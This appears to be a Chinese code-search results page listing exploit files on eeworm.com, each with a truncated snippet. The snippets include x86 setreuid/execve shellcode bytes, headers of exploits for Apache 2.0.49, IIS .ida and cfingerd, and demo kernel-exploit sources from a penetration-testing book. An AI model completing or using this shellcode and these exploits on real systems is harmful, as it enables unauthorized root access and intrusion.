代码搜索:exploit
找到约 10,000 项符合「exploit」的源代码
代码结果 10,000
www.eeworm.com/read/439252/7713816
txt ie exploit.txt
受影响系统:
IE 6.0.2800.1106 SP1, Q832894, Q330994, Q837009 Q831167
受攻击的构成部分:
* mshtml.dll version 6.0.2734.1600
当用户用右键在IE里面点击一种带有双冒号“::”和一个大括号的左半边 “{” 的特殊植入连接时,IE就会坠毁。
下面是一个HTML文件的例子:
-----------
www.eeworm.com/read/299940/7819638
txt apache exploit.txt
Apache 2.0.49溢出 源代码
收集: 冷血*无情
受影响版本: Apache 2.0.49 Apache 1 没有测试过
#!/usr/bin/perl
#
#exploit for apache ap_get_mime_headers_core() vuln
#
#adv is here: http://www.guninski.com/httpd1.html
#
www.eeworm.com/read/332113/3401445
c fso_exploit.c
/* fso_exploit.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 针对vul.c的FSO漏洞利用程序
*/
#include
#include
#include
#define FUNCTIONOFFSET 0x1
www.eeworm.com/read/332113/3401515
c kformat_exploit.c
/* kformat_exploit.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 针对kformat.c的利用程序
* gcc -o kformat_exploit kformat_exploit.c
*/
#include
#include
#i
www.eeworm.com/read/332113/3401517
c kipstack_exploit.c
/* kipstack_expolit.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 针对kipstack.c的利用程序
* gcc -o kipstack_expolit kipstack_expolit.c
*/
#include
#include
www.eeworm.com/read/332113/3401518
c kbof_exploit.c
/* kbof_exploit.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 针对kbof.c的利用程序
* gcc -o kbof_exploit kbof_exploit.c
*/
#include
#include
#include
www.eeworm.com/read/394442/8224303
c exploit1.c
char shellcode[]=
// setreuid(0,0);
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x46" // mov $0x46,%al
"\xcd\x80" // int $0x80
// execve /bi
www.eeworm.com/read/394442/8224307
c exploit2.c
#include
#include
#include
char shellcode[]=
// setreuid(0,0);
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb
www.eeworm.com/read/101671/15822390
sh ida-exploit.sh
#!/bin/sh
# .ida nasty exploit
# mat@hacksware.com,mat@monkey.org
# http://monkey.org/~mat
#
# If this exploit succeeds, you can get into the machine through port 8008
# shellcode generated by DeepZon
www.eeworm.com/read/101671/15822418
pl cfingerd-exploit.pl
#!/usr/bin/perl
# | Local buffer overflow exploit for cfingerd
# | Copyright (c) 2001 by
# | All rights reserved.
# |
# | Simple exploit for the vulnerability reported
# | to